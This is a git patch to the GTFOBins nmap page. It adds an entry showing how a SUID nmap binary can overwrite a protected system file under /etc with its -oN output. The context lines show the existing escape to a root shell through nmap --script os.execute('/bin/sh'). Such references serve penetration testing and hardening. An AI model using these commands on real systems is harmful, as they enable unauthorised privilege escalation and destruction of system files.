From edc8a2d03da03caf8e0b698938f6c0895a395964 Mon Sep 17 00:00:00 2001 From: Syed Umar Arfeen <18597330+Anon-Exploiter@users.noreply.github.com> Date: Mon, 4 Jan 2021 12:16:29 +0500 Subject: [PATCH] Adding another usage of Nmap's SUID I came along with this method on stackoverflow while trying to execute commands using a SUID nmap binary, though `--script` failed me but this works. Could be enough to demonstrate effect of using SUID on Nmap. I've yet to come up with a way to over-write the contents of the system file according to what we want, with this we can only over-write files with nmap output. ```bash sudo touch /etc/filecantbetouched nmap 127.0.0.1 -oN=/etc/filecantbetouched cat /etc/filecantbetouched ``` --- _gtfobins/nmap.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/_gtfobins/nmap.md b/_gtfobins/nmap.md index 7374564..0d4ccc6 100644 --- a/_gtfobins/nmap.md +++ b/_gtfobins/nmap.md @@ -108,4 +108,9 @@ functions: TF=$(mktemp) echo 'os.execute("/bin/sh")' > $TF ./nmap --script=$TF + - description: This will over-write files with nmap output, use with caution. + code: | + sudo touch /etc/filecantbetouched + nmap 127.0.0.1 -oN=/etc/filecantbetouched + cat /etc/filecantbetouched ---